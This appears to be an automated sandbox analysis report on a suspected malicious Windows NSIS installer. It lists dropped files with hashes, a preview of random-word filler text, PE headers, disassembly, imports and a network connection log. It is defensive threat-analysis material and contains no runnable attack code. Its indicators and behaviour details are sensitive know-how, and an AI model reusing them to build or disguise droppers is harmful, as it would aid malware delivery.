                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):8230
                                        Entropy (8bit):4.9095691270975985
                                        Encrypted:false
                                        SSDEEP:192:ADjauT3yXT1VRXVkCGOeTC3WgdgTNb7dYSxs446HTXZG:ADjaZDFV7Hx3Wgd8b757k
                                        MD5:6E58E362553B5789E1069A0179B61372
                                        SHA1:99780077DCED2149B6BF80439172FF98DF8F90E6
                                        SHA-256:EF7907372F05F11488321AB0694B0C59BB487F9B8C87E6C7AD93D33C226EB194
                                        SHA-512:6FB5A47A7B8937D898FF58D4FC5ED7959AB10C9E3EDDF66585BE7FB011CF46AC7EDA4FDCBF81297DEB841DE807A3CA2A23C4B205C71CDDEF8D8DC87B1B15EFB0
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):404216
                                        Entropy (8bit):7.599120760001494
                                        Encrypted:false
                                        SSDEEP:6144:VAroeZ4lykF1c21VPARc0PSN88MbZmtaB7Y5G0Px4NpQqKPSdrEnxMGwkG8P3Usn:VArogB21UpSFMz8s02Npjdo6G9/Usn
                                        MD5:CDF881DA1B168CBEC3619DD44BCB939B
                                        SHA1:41CD6AFE34626969BAF069CF0334ABADD36EC3DC
                                        SHA-256:D11D28DAC2B96527A92CA760A8A80BABDFE4CE6A77E1A4785CB7F61D7A2080C6
                                        SHA-512:3927702DE1EEC0EAAC51BBDF373EA57D2BA50092BEB1680FCD0361889AAD2AC794C8A15452D14C61B7967C058DC11F391D4BD77038E204D6C92F8FF9068BA1B9
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1767
                                        Entropy (8bit):4.936734149511583
                                        Encrypted:false
                                        SSDEEP:24:n4sZF5zb4UBKl2YkTL9us5GTtqBXclmjZk/7V91eIS9naSCKvDwoqjLpKk1Na:nNJ+rkvspOclmdkzX1L8aS70ouUaa
                                        MD5:9A172303DA4D5A6FFFA3583CD88A6848
                                        SHA1:A59F712638898ED08E235ED321B8F3033F32B324
                                        SHA-256:E99BB7DF5EA4A3983D7308A41630A8B1128A1F7E0E59B7F02511DFC71E67BDC4
                                        SHA-512:4C6755EA315DCA8868EA650CFAEE595D60B910A6829DF232CDDB617318BD81B40A8E407E5B5135A485EEDD76265A04A2FF75DBE656C5D216F1EF0672EAAF5631
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):9445
                                        Entropy (8bit):4.921016570871312
                                        Encrypted:false
                                        SSDEEP:192:VTVWctVeruwskAXv0v/LLDkNpYl7R/OuR6CHkm/EpRGtfMCzYaKN/:2ctsTCf0r0LcOuR6CHv8VsK
                                        MD5:852509E2C3FFFA729FDFFCCFE066CDB4
                                        SHA1:F1C2F850464412285FF92F72613CA9442DB734E8
                                        SHA-256:FE87AC62DBC45B792551492C09613DB3F2831185F6E7A33CE5617BB0E59E3FA1
                                        SHA-512:B4C1542FD567D265BD78DF03691051D874EF6CD8FE6D29AD418C7DD766B7067183AF5608E9F15941515B0E7846215399AF33DD1FACDF0BAB966764B6CA377CD1
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):10676
                                        Entropy (8bit):4.902534302182149
                                        Encrypted:false
                                        SSDEEP:192:RmN6YZxvgXhbbZhe6/PK5X1937sCfOh1ZGXerBUfk89HHWva2GkzypGBnaRKb:QNLxvgXhXZhh/PK5XH3QukzGOrBUfk8m
                                        MD5:2B83BF46A89D65CF762BDDC2C38E9E7B
                                        SHA1:E59B337AC20C43CE7F4B486C38486F8912C98789
                                        SHA-256:624B10DFF501106FD6297B70FAFB3505DD1AACDAA29D895E72A0AE77CA0FAB90
                                        SHA-512:6C217CAF5D9A5F679C6E4904904B0B19F11C8A42547056442783F32CE73723FDD4F159127D38ACC34CB3A91A3553FF73159ED895ED89E5A264426154F512AF97
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):11037
                                        Entropy (8bit):4.8737997168752125
                                        Encrypted:false
                                        SSDEEP:192:5D/P9kefPUbCijjBw/TI5F44EOvex8O5+2idKNr1k7PKTf0YsBcCfPdlEjQM/:tP/fPU+ijoQF44EOGuO5+2VNre+L0YkI
                                        MD5:BD2878F5871E874FA3A7C037048F7C3C
                                        SHA1:DDB784273BF208161E10C930EF94788F42C1E4BD
                                        SHA-256:A82D5E28FF5C786801A0D526DB840EE3452B74274C0D95A37C9A7180E0859D87
                                        SHA-512:35CD9C96334787A3D0168367FB27714339FDBC9F3107F81B2197730BF7B496D038B2D617F4F6C6F6D1A4B2C6375C9C36732AF715E88B7F5CB2FA69516868CD24
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1724
                                        Entropy (8bit):4.665955956980643
                                        Encrypted:false
                                        SSDEEP:24:ZsK6DXm4O/SIzh3T3DcW9kjioek2kiE7I8JLEXIcfpy3gILbHLEyoUQll:ZX4O66cykxGE7rEIuIv/oyoB7
                                        MD5:509F09BC859F53A5D728B23EA140EAB6
                                        SHA1:99E6E1EFE5EB129B608E81F90B0109EAE1763D31
                                        SHA-256:FCC5D4A2E0881D23F6C696DFB854B0B348FB552C4CF6B001C2B2594F14E7F499
                                        SHA-512:5C9CE0916D77DE0D51FCF90DCD25144B679B5827074ACBE2C74D862702582B6001A201540D5B00F07AFCBB1FD1908C1579D2B05B69A85C4DACFC1E7274711AB9
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):13161
                                        Entropy (8bit):4.9126755870483
                                        Encrypted:false
                                        SSDEEP:384:X1AiZV4bKGFvytAAQTi5hMU708wbHhzCiFel:llXGFy9D4HJ3K
                                        MD5:6D9C825C8AE36D64EEF435461CE73532
                                        SHA1:4718C6BE7780A611D9A88E99EFFE5DFF487F9BEC
                                        SHA-256:00D99DD2F1D3196580D52247D1D45605DA3F5EE2893BDE0B6855DD10E63A7569
                                        SHA-512:B8E8BF5E1872D3981629D6747C21AE4634628792997C9322C0088251D47FCB83A516D6DFF3C694D0134EB9BA77EC7D7BF3B09994EC9ABED01554637AEA6F4DA7
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):7123
                                        Entropy (8bit):4.932139967662198
                                        Encrypted:false
                                        SSDEEP:96:cAbrH6fD8NbUwBsatM8DzRcRWXqUrDcML+Cf+5arV1lSRiHzLUlkLBj4I1Xk0:tLeD8BDmRlAHlnlS2LUkuI100
                                        MD5:D81EC25A5BEE5D384868B24A6A8C663F
                                        SHA1:F131AB88175DAF4039D860FEEEC4B1A6D21E121E
                                        SHA-256:2C11D49A6BFB47ED8197A18DED9282686795BAB7E2F09B7B127917C88269B206
                                        SHA-512:2BE940E42C70C592B2F9C3637F56851BFBBB8FAB5539D51E04C3ED2E15E76E88562D176B234739C8EEA3F438D328065E471077C278A2DACE8AF2FED02CE7C6A9
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):15098
                                        Entropy (8bit):4.909030925775806
                                        Encrypted:false
                                        SSDEEP:192:fNq+2AFf73C5TP3cahnwy2G6kZhcm/bA/wdY1Z6+gFIDsPkXL4AQLd0hge1g3:ff2+u3wqbculuL949y/y
                                        MD5:74779824ACAE1E1C870095C780405054
                                        SHA1:DC4C932288B739DD1345D7BF64A683750BEE2C4D
                                        SHA-256:809FDA512937EF4C6BC58C22C47993DFA100AE4DF56C8B0A14CB759A40E6EF62
                                        SHA-512:DCCC9248E22CB16BBFDF7985F116F599EB97A4B63CCF8203276C600765648062C59238BE409B18E9C9F09840E80451F3CF2F59CEAE5B8D098C38BC5E399F4474
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):3930
                                        Entropy (8bit):4.785707533776321
                                        Encrypted:false
                                        SSDEEP:48:eYGsZJaswkWb5y5SwsmAeeiVSRG8fcl6FH7tSVlPgc6pcAUkWz+CaN6wm0uln:wwaqEy5SwsLeeicgAcl6FbIVucAUEFq
                                        MD5:F4F390C25CFBB9F86EDAD76C437F6571
                                        SHA1:548390DEB8C7A5021676CB1E0C03FC6AABF89B98
                                        SHA-256:AF12D990703C8FC341CBF9FE7F5B51938408D5FE48CA388DB39BDCD35EDD90D3
                                        SHA-512:47F0520EAFA72308B188099F796E9713A4CFCDEA9BBBBF523136A371AEA3D4D167F3467708CE9EC6D82BC09862DA7D5BD122CB183796E948BCAB41665D07238A
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:OpenPGP Secret Key
                                        Category:dropped
                                        Size (bytes):11048
                                        Entropy (8bit):4.872168059153243
                                        Encrypted:false
                                        SSDEEP:192:dZ0sW/87yXEweaM8tpic2SGGfMIyUlj0wggbxIrfmsxiS:dZ0sw87zjBspic2SGGR1lj0wgoxI3J
                                        MD5:7721863171BA672F3F660981C836E35B
                                        SHA1:6F7A2C0D30D51CA6B31F0FCC803D58100D1D54BE
                                        SHA-256:290F31B8FB70C5E745918DF19CF3A2DD3E7D368A2BC5D9C79611D004AB2AC9D8
                                        SHA-512:0474541FFE562D37BB638EA5500189F4E093E59A6CE8F4039E1BDD4FFB4EF7CBFA18D6850F81DA416DCF91BA40836C73684BE405091708351F5ACD00DD27CC3C
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):592
                                        Entropy (8bit):4.204861403479884
                                        Encrypted:false
                                        SSDEEP:12:PjO2xFPAeLUzV3ByBRCs+4LlMvJLHYEEHaBAH2s2N+k/+IQI:PiOF3UzlByBRCsVGtYEYWsY+E+IQI
                                        MD5:8097E08408C796656D6FBE5B4011609A
                                        SHA1:234444944CBE5C50C7DC38FD51C565CCA3276164
                                        SHA-256:24677BD64BDFB8D904A096D013232993C005856ED59AA5FFBE504EB4F761CD75
                                        SHA-512:127264BCA9489E3CEF728204AA128E705730513025E8B7E0F8464ABE5D0EDEE3FC8D5043E4DA7D8A67A3A115AEF7237BC04C6CD5CD956923AFC1921FD3D29638
                                        Malicious:false
                                        Preview:gasterozooid blottedes undershrievery reorientation konsistoriemedlems dokumentdisketten brevstemmende defilerede studiekammerater forstuvelsens..metastrophic kabiet serb aflbsrens ordmnstrets simulatoropgave tholes,frygtlse cloudlessly fylderiets kpheste isabelles unsalvageably appelerer optics infralyd theligonaceae suspensively..snerp separatkabinettet paralegal xenofobiernes chervante stivelseskorn achromobacterieae,brygmester brevaabners kontraheredes pullulated musketerens studentereksamener poliad,underarmsmusklen askorbinsyretabletten backtracks stvises termcap kinoorgels trog.
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):15062
                                        Entropy (8bit):4.9357451772131204
                                        Encrypted:false
                                        SSDEEP:384:pl7QxurtO8pawzlNSBjw6YhtRK61R1f7W0:P7QxuhO8pawgwXR1TW0
                                        MD5:56013432CE9F5F20196ED4D8766EB72A
                                        SHA1:4DF3B7CDFFD65DD9D14BB212080C608703906554
                                        SHA-256:71341213976B73E52A10998CCB06599C8EDC6E7D12E3338927FE56E5DABAE760
                                        SHA-512:C8BB9713C4E9B7CB95C452FA8E112B0C11A92F7C3661D902E50B51552981AB60404E5D84FB3CFC7B4794963C06E3B0E73892794CDAAF95846B8B67B838AE384A
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:OpenPGP Public Key
                                        Category:dropped
                                        Size (bytes):13588
                                        Entropy (8bit):4.923594985159061
                                        Encrypted:false
                                        SSDEEP:192:JwxK7lxC6+88oXtWeJvBdfUW8aZcrZFb0IDAeXBZ3QHju4LEFdTKUAZNW:Jd+6+88neJvB78aiZZDDXBZADu4LaSZQ
                                        MD5:A1BB2C0226A81753C3C2F6FA6562B6F3
                                        SHA1:EDC6ECAFA090B95F7B4A3E3B26A6A4E5539D932B
                                        SHA-256:F89E9A19B6D6A219D9AAC39623DC5C30CFEA6519CC7376E18656A5A7C999DC53
                                        SHA-512:26695DBF9FDE77625A12BE1F12797DF821B8B20204D4BE58D5E43E27159908D7AFBA4ADAA1B39438D931C076854877B3008A4F12CE984053C877D5C89E15F000
                                        Malicious:false
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Entropy (8bit):7.9509411156021095
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 92.16%
                                        • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:ulACwpUCSU.exe
                                        File size:627'775 bytes
                                        MD5:b6f8b1c89399490857facfcf5bb78d86
                                        SHA1:898e59e55c027c47833f435fff28ed20da9ecdc8
                                        SHA256:c4c7ed9360322bf463828c0e86a131a081ecc700fe32dc0215d392251771a6de
                                        SHA512:5b1539c96bfe2e04844dcceb36cfe5f9891b45e8fa0419c5ba80deca6624912717949a6650e364ce467fa777803fa87768eb923db7f2c82d3d671f5e7f398095
                                        SSDEEP:12288:2K9/JmMgq+TiZFJVsTej3s1XmPUMLyAetbdrjkcifO+aMs+s:tj+TirqejomPUzNVZkcirass
                                        TLSH:3AD422A263D1C06FE055677AD9A2D7FBE1159C66D836470B2F117FBA3C761038E0B222
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....\.U.................^...........2.......p....@
                                        Icon Hash:4740490d27a52145
                                        Entrypoint:0x403217
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x55C15CE3 [Wed Aug 5 00:46:27 2015 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:59a4a44a250c4cf4f2d9de2b3fe5d95f
                                        Instruction
                                        sub esp, 00000184h
                                        push ebx
                                        push ebp
                                        push esi
                                        xor ebx, ebx
                                        push edi
                                        mov dword ptr [esp+18h], ebx
                                        mov dword ptr [esp+10h], 00409130h
                                        mov dword ptr [esp+20h], ebx
                                        mov byte ptr [esp+14h], 00000020h
                                        call dword ptr [00407034h]
                                        push 00008001h
                                        call dword ptr [004070B4h]
                                        push ebx
                                        call dword ptr [0040728Ch]
                                        push 00000009h
                                        mov dword ptr [004237B8h], eax
                                        call 00007FD920B9352Ah
                                        mov dword ptr [00423704h], eax
                                        push ebx
                                        lea eax, dword ptr [esp+38h]
                                        push 00000160h
                                        push eax
                                        push ebx
                                        push 0041ECB8h
                                        call dword ptr [00407164h]
                                        push 004091E4h
                                        push 00422F00h
                                        call 00007FD920B931D4h
                                        call dword ptr [004070B0h]
                                        mov ebp, 00429000h
                                        push eax
                                        push ebp
                                        call 00007FD920B931C2h
                                        push ebx
                                        call dword ptr [00407118h]
                                        cmp byte ptr [00429000h], 00000022h
                                        mov dword ptr [00423700h], eax
                                        mov eax, ebp
                                        jne 00007FD920B9072Ch
                                        mov byte ptr [esp+14h], 00000022h
                                        mov eax, 00429001h
                                        push dword ptr [esp+14h]
                                        push eax
                                        call 00007FD920B92C52h
                                        push eax
                                        call dword ptr [00407220h]
                                        mov dword ptr [esp+1Ch], eax
                                        jmp 00007FD920B907E5h
                                        cmp cl, 00000020h
                                        jne 00007FD920B90728h
                                        inc eax
                                        cmp byte ptr [eax], 00000020h
                                        je 00007FD920B9071Ch
                                        Programming Language:
                                        • [EXP] VC++ 6.0 SP5 build 8804
                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x2b6d8 | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x1000 | 0x5c3a | 0x5e00 | e5e7adda692e6e028f515fe3daa2b69f | False | 0.658951130319149 | data | 6.410406825129756 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata | 0x7000 | 0x11ce | 0x1200 | 5801d712ecba58aa87d1e7d1aa24f3aa | False | 0.4522569444444444 | OpenPGP Secret Key | 5.236122428806677 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data | 0x9000 | 0x1a7f8 | 0x400 | cc58d0a55ac015d8f1470ea90f440596 | False | 0.615234375 | data | 5.02661163746607 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .ndata | 0x24000 | 0x14000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc | 0x38000 | 0x2b6d8 | 0x2b800 | b6d42514c2cc09fb8e6265d6a2c193e7 | False | 0.9366244612068966 | data | 7.857509251924338 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                        RT_ICON | 0x38418 | 0x18ef9 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.000401421619981
                                        RT_ICON | 0x51318 | 0x833d | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States | 0.9935410899782718
                                        RT_ICON | 0x59658 | 0x350c | PNG image data, 256 x 256, 4-bit colormap, non-interlaced | English | United States | 1.0008100147275405
                                        RT_ICON | 0x5cb68 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.6025933609958506
                                        RT_ICON | 0x5f110 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6329737335834896
                                        RT_ICON | 0x601b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304 | English | United States | 0.7006929637526652
                                        RT_ICON | 0x61060 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024 | English | United States | 0.7924187725631769
                                        RT_ICON | 0x61908 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.5280487804878049
                                        RT_ICON | 0x61f70 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256 | English | United States | 0.7109826589595376
                                        RT_ICON | 0x624d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.7225177304964538
                                        RT_ICON | 0x62940 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.6854838709677419
                                        RT_ICON | 0x62c28 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.7263513513513513
                                        RT_DIALOG | 0x62d50 | 0x100 | data | English | United States | 0.5234375
                                        RT_DIALOG | 0x62e50 | 0x11c | data | English | United States | 0.6056338028169014
                                        RT_DIALOG | 0x62f70 | 0xc4 | data | English | United States | 0.5918367346938775
                                        RT_DIALOG | 0x63038 | 0x60 | data | English | United States | 0.7291666666666666
                                        RT_GROUP_ICON | 0x63098 | 0xae | data | English | United States | 0.6264367816091954
                                        RT_VERSION | 0x63148 | 0x24c | data | English | United States | 0.5255102040816326
                                        RT_MANIFEST | 0x63398 | 0x33f | XML 1.0 document, ASCII text, with very long lines (831), with no line terminators | English | United States | 0.5547533092659447
                                        DLL | Import
                                        KERNEL32.dll | GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, CloseHandle, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, GetTempPathA, GetWindowsDirectoryA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
                                        USER32.dll | CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                        GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                        SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                        ADVAPI32.dll | RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                        COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                        ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                        VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                                        Language of compilation system | Country where language is spoken | Map
                                        English | United States |
                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Jun 4, 2024 14:34:05.006422997 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.099365950 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.099569082 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.099580050 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.099781036 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.104059935 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.104243994 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.104254007 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.104461908 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.113641024 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.113850117 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.113859892 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.114135027 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.123218060 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.123428106 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.123439074 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.123712063 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.132797003 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.133004904 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.133016109 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.133285999 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.142363071 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.142570972 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.142581940 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.142849922 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.151962996 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.152102947 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.152112007 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.152349949 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.161516905 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.161768913 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.161778927 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.162101030 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.170412064 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.170562983 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.170572996 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.170809984 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.179155111 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.179311991 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.179327965 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.179682970 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.188035011 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.188230038 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.188251972 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.188509941 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.196890116 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.197082996 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.197093010 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.197422981 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.205682039 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.205873013 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.230825901 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.231080055 CEST49793443192.168.11.30142.250.217.193
